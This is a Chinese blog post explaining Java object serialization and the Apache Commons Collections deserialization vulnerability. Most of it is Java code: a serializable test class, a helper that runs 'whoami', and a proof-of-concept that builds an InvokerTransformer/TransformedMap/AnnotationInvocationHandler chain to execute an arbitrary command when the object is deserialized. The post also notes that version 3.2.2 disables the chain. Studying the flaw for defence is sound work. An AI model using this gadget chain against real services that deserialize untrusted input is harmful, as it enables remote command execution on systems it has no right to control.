java对象序列化与反序列化漏洞

最新推荐文章于 2024-07-02 03:45:00 发布
最新推荐文章于 2024-07-02 03:45:00 发布
阅读量1.1k 收藏
点赞数
分类专栏: 网络安全攻击与防御 回顾java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20745827/article/details/80405258
版权

在这里写一下之前做的一个小测试,就是关于java中对象序列化的demo。

先贴出序列化测试类

package com.lazy.cc;

import java.io.Serializable;
/**
 * User: 老辉辉
 * Date: 2018/05/11
 */
public class SerialObject implements Serializable {
	/**
	 * SerialObject实现Serializable接口作为序列化的测试类,这个类的所有属性和方法都会自动序列化
	 * 而这就要提到transient,使用其修饰的属性将不需要序列化的属性前添加关键字transient,
	 * 在序列化对象的时候,这个属性就不会序列化到指定的目的地中。
	 */
	private static final long serialVersionUID = 1L;
	public int number;
    public String name;
    public transient String address;
    public void logInfo()
    {
      System.out.println("number: " + number + " name: " + name + " address: " + address);
    }
	public SerialObject(int number, String name, String address) {
		this.number = number;
		this.name = name;
		this.address = address;
	}
	public SerialObject() {
	}
}

下面贴一下测试的代码:

package com.lazy.cc;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

/**
 * User: 老辉辉
 * Date: 2018/05/11
 */
public class mainText {

	/**
	 * 命令执行函数
	 * @param command
	 * @throws IOException
	 * @throws InterruptedException
	 */
	private static void execTest(String command) throws IOException, InterruptedException {
		System.out.print("exec 'whoami' in cmd results:  ");
		//执行command
        Process process = Runtime.getRuntime().exec(command);
        //结果回显
        InputStream inputstream = process.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(inputstream));
        process.waitFor();
        if (process.exitValue() != 0) {
        	System.out.println(process.getErrorStream());
        }
        String msg = null;
        while ((msg = reader.readLine()) != null) {
            System.out.println(msg);
        }
    }
	
	/**
	 * 测试POC
	 * @param command
	 * @throws ClassNotFoundException
	 * @throws NoSuchMethodException
	 * @throws SecurityException
	 * @throws InstantiationException
	 * @throws IllegalAccessException
	 * @throws IllegalArgumentException
	 * @throws InvocationTargetException
	 * @throws FileNotFoundException
	 * @throws IOException
	 */
	private static void testPOC(String command) throws ClassNotFoundException, NoSuchMethodException, SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException, FileNotFoundException, IOException {
		Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                /*
			                由于Method类的invoke(Object obj,Object args[])方法的定义
			                所以在反射内写new Class[] {Object.class, Object[].class }
			                正常POC流程举例:
                ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit");
                */
                new InvokerTransformer(
                    "getMethod",
                    new Class[] {String.class, Class[].class },
                    new Object[] {"getRuntime", new Class[0] }
                ),
                new InvokerTransformer(
                    "invoke",
                    new Class[] {Object.class,Object[].class },
                    new Object[] {null, null }
                ),
                new InvokerTransformer(
                    "exec",
                    new Class[] {String[].class },
                    new Object[] { command }
                    //new Object[] { execArgs }
                )
            };

            //transformedChain: ChainedTransformer类对象,传入transformers数组,可以按照transformers数组的逻辑执行转化操作
            Transformer transformedChain = new ChainedTransformer(transformers);
            Map<String,String> BeforeTransformerMap = new HashMap<String,String>();
            BeforeTransformerMap.put("hello", "hello");

            //TransformedMap.decorate(目标Map, key的转化对象(单个或者链或者null), value的转化对象(单个或者链或者null));
            Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, null, transformedChain);
            Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
            Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
            ctor.setAccessible(true);
            
            //构造器生成实例化对消
            Object instance = ctor.newInstance(Target.class, AfterTransformerMap);
            ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(new File("temp.bin")));
            out.writeObject(instance);
	}
	
	public static void main(String[] args) throws FileNotFoundException, IOException, ClassNotFoundException, InterruptedException, NoSuchMethodException, SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
		
		//①测试序列化对象
		SerialObject serialObject = new SerialObject(2, "lazyhunter", "xiamen");
		ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("tmp.ser"));
		oos.writeObject(serialObject);
		oos.close();
		
		//②读取反序列化对象
        ObjectInputStream in = new ObjectInputStream(new FileInputStream("tmp.ser"));
        SerialObject readObject = (SerialObject) in.readObject();
        readObject.logInfo();
        in.close();
        
        //③测试java命令执行,测试一个常用命令"whoami"的执行
        execTest("whoami");
        
        /**
         * 这里先提一下java的反射机制
         * 在java运行状态中:
		 *		1.对于任何一个类,都能获得对象所属的类;
		 *		2.对于任何一个类,都能获取其所有的属性和方法;
		 *		3.对于任何一个对象,都能调用任意一个方法和属性;
		 */
        
		/**
		 * 因此,可以通过构造特定的恶意对象序列化后的流,让目标反序列化,
		 * 加上反射机制就可以调用对象的方法(整个对象都是我们自己构建的,这个method就是一个攻击入口)
		 * 
		 * 很多站点或者RMI仓库等接口处存在java的反序列化功能,就可以利用其执行命令,甚至getshell等等。
		 * 比如:Apache Commons Collections
		 * 这个框架中有一个接口,其中有一个实现该接口的类可以通过调用java的反射机制来调用任意函数,这个接口类是InvokerTransformer。
		 * 
         */
        
        /**
         * 参考网络大牛的poc,分析利用逻辑。
         * 定义一个反射链的方法:
	     * Transformer[] varitename = new Transformer[] {
	     *    new ConstantTransformer(Runtime.class),
	     *     new InvokerTransformer("getMethod",new Class[] {String.class,Class[].class},new Object[] {"getRuntime",new Class[0]}),
	     *     new InvokerTransformer("invoke",new Class[] {Object.class,Object[].class},new Object[] {null, null})
	     *     new InvokerTransformer("exec",new Class[] {String[].class},new Object[] {commandstring})
	     *   }
	     */  
        
        /**
	     * 1)首先构造一个Map和一个能够执行代码的ChainedTransformer,
		 * 2)生成一个TransformedMap实例
		 * 3)实例化AnnotationInvocationHandler,并对其进行序列化,
		 * 4)当触发readObject()反序列化的时候,就能实现命令执行。
		 * POC执行流程为 TransformedMap->AnnotationInvocationHandler.readObject()->setValue()- 漏洞成功触发
         */
        //④利用反序列化对象来执行命令
        testPOC("whoami");
        
	}

}

这里再讲一下,测试中一个有趣的事情,我在测试的时候使用的是commons-collections-3.2.2.jar。恰好已经在在3.2.2版本中做了修复,对这些不安全的Java类的序列化支持增加了开关,默认为关闭状态。于是有了以下的报错:

Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons. To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true', but you must ensure that your application does not de-serialize objects from untrusted sources.

LazyHunter9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
java.io.notserializableexception java序列化报错
野生码农
01-26 2万+
数据结构中多增加了个字段,然后报错了,刚开始怎么都没想到,哈哈。~    解决此异常,一般大家知道方法就是,既然报没有序列化的错误,那我们就把我们的对象序列化了就是了,实现起来也很简单,就是把要放入对象序列化即可 public class YourClassName implements java.io.Serializable{ }        于是修改此实现Serializ
java序列化异常java.io.NotSerializableException \InvalidClassException
weixin_35695688的博客
07-21 700
在idea中双击shift,查找异常 异常:实例没有实现Serializable接口时,会抛出异常。 想要序列化,需要实现Serializable 接口,否则会抛出异常java.io.NotSerializableException package com.msb.seri; import java.io.Serializable; public class Person implements Serializable { private String name; privat
已解决java.io.NotSerializableException:对象不支持序列化的正确解决方法,亲测有效!!!
最新发布
小明的Java问道之路
07-02 1311
/ 自定义序列化逻辑// 自定义反序列化逻辑// Getter 和 Setter 方法...是在尝试对无法序列化对象进行序列化操作时常见的异常。通过确保所有需要序列化对象及其嵌套对象都实现接口,检查所有字段是否可序列化,以及处理动态代理,可以有效地解决这个问题。本文详细介绍了问题的成因、解决思路和具体的解决方法,希望能帮助开发者在实际项目中避免和处理这一异常,确保应用程序的稳定运行。以上是此问题报错原因的解决方法,欢迎评论区留言讨论是否能解决,如果本文对你有帮助 欢迎关注!!
java.io.NotSerializableException异常
luckdh的博客
03-29 3297
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Shiro中SimpleByteSource序列化异常:java.io.NotSerializableException:org.apache.shiro.util.SimpleByteSource
10-16 1083
异常说明 在学习Shiro使用缓存时,出现:java.io.NotSerializableException:org.apache.shiro.util.SimpleByteSource异常。出现这种情况是因为:SimpleByteSource没有是实现Serializable接口。 解决方案 第一步:自定义一个继承SimpleByteSource实现Serializable接口 public class MySimpleByteSource extends SimpleByteSource implem
org.apache.ibatis.cache.CacheException: Error serializing object. Cause: java.io.NotSerializableExc
zoxm
08-21 3420
org.apache.ibatis.cache.CacheException: Error serializing object. Cause: java.io.NotSerializableException: com.baizhi.entity.User at org.apache.ibatis.cache.decorators.SerializedCache.serialize(Seria...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
java反序列化漏洞-验证.rar
06-25
1. **Java反序列化漏洞**:当不信任的数据源提供的序列化对象反序列化时,如果对象包含危险的方法(如`ObjectInputStream.readObject()`),攻击者可以构造特殊的序列化数据来触发这些方法,执行任意代码。...
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
java.io.NotSerializableException错误原因及解决方法
new03的专栏
01-21 4624
运行tomcat下面的 ssh项目,启动,打开某页面(让session起作用),停止;再启动,有可能会报似如下的错误: org.apache.catalina.session.StandardManager doLoad 严重: IOException while loading persisted sessions: java.io.WriteAbortedException: w...
Java基础系列(基础):Java序列化java.io.Serializable!
Mr_chen的博客
07-04 1116
Java基础系列(基础):通用唯一标识码UUID的介绍及使用! 前言 今天博主将为大家分享:Java基础系列(基础):Java序列化java.io.Serializable!不喜勿喷,如有异议欢迎讨论! 什么是序列化 Java 对象序列化是 JDK 1.1 中引入的一组开创性特性之一,用于作为一种将 Java 对象的状态转换为字节数组,以便存储或传输的机制,以后,仍可以将字节数组转换回 ...
java.io.NotSerializableException错误解决方法
08-09 236
在重启Tomcat 5时发现报此错误. 查阅后发现tomcat 5之后重启服务后tomcat会尝试恢复session. 解决方法: 方法一(通过配置,使tomcat重启后不重新恢复session): 在关闭和重启Tomcat 5时, tomcat 会试图 serialize存在的session资源. 如果 sessions中相关的对象没有实现 serializable 接口, 就会出现...
java.io.NotSerializableException异常的解决方案
热门推荐
yilongchuan的博客
12-30 1万+
先说解决方法再说原因 解决方法:报错信息会指示出问题的是哪个实体,在该实体的后面加上一句 “implements Serializable”,例如 import java.io.Serializable; public class User implements Serializable{ } 如果加了“implements Serializable”之后还是报错,你会发现报...
field.setAccessible(true);代码扫描有安全漏洞,解决方案
qq_44293888的博客
08-18 1万+
AccessibleObject是Field、Method和Constructor对象的基,能够允许反射对象修改访问权限修饰符,绕过由Java访问修饰符提供的访问控制检查。它让程序员能够更改私有字段或调用私有方法,这在通常情况下是不允许的。 例如:以下代码片段中,将Field将accessible标记设置为true。 Class clazz = User.class; Field field = clazz.getField("name"); field.setAccessible(true); ...
SerializationException报错的解决方法,亲测有效,嘿嘿嘿
PythonAigc的博客
05-08 627
`SerializationException` 异常通常与 Java 对象序列化serialization)和反序列化(deserialization)相关。这个异常可能由多种原因引起,下面我们将分析这个异常,解释可能的报错原因,并提供解决思路和方法,并附带代码示例。 ### 问题分析 `SerializationException` 并不是 Java 标准库中的一个特定异常。但是,当你看到与序列化相关的异常时,它们可能是 `java.io.IOException` 的子,如 `NotSeria
Java与Jackson反序列化漏洞深度解析
"深入解析JAVA及Jackson反序列化漏洞" 本文主要探讨了Java和Jackson库的反序列化原理,以及相关的安全问题。Java反序列化是一个关键的编程概念,它允许将对象的状态转换为字节流,以便存储或在网络中传输,然后在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值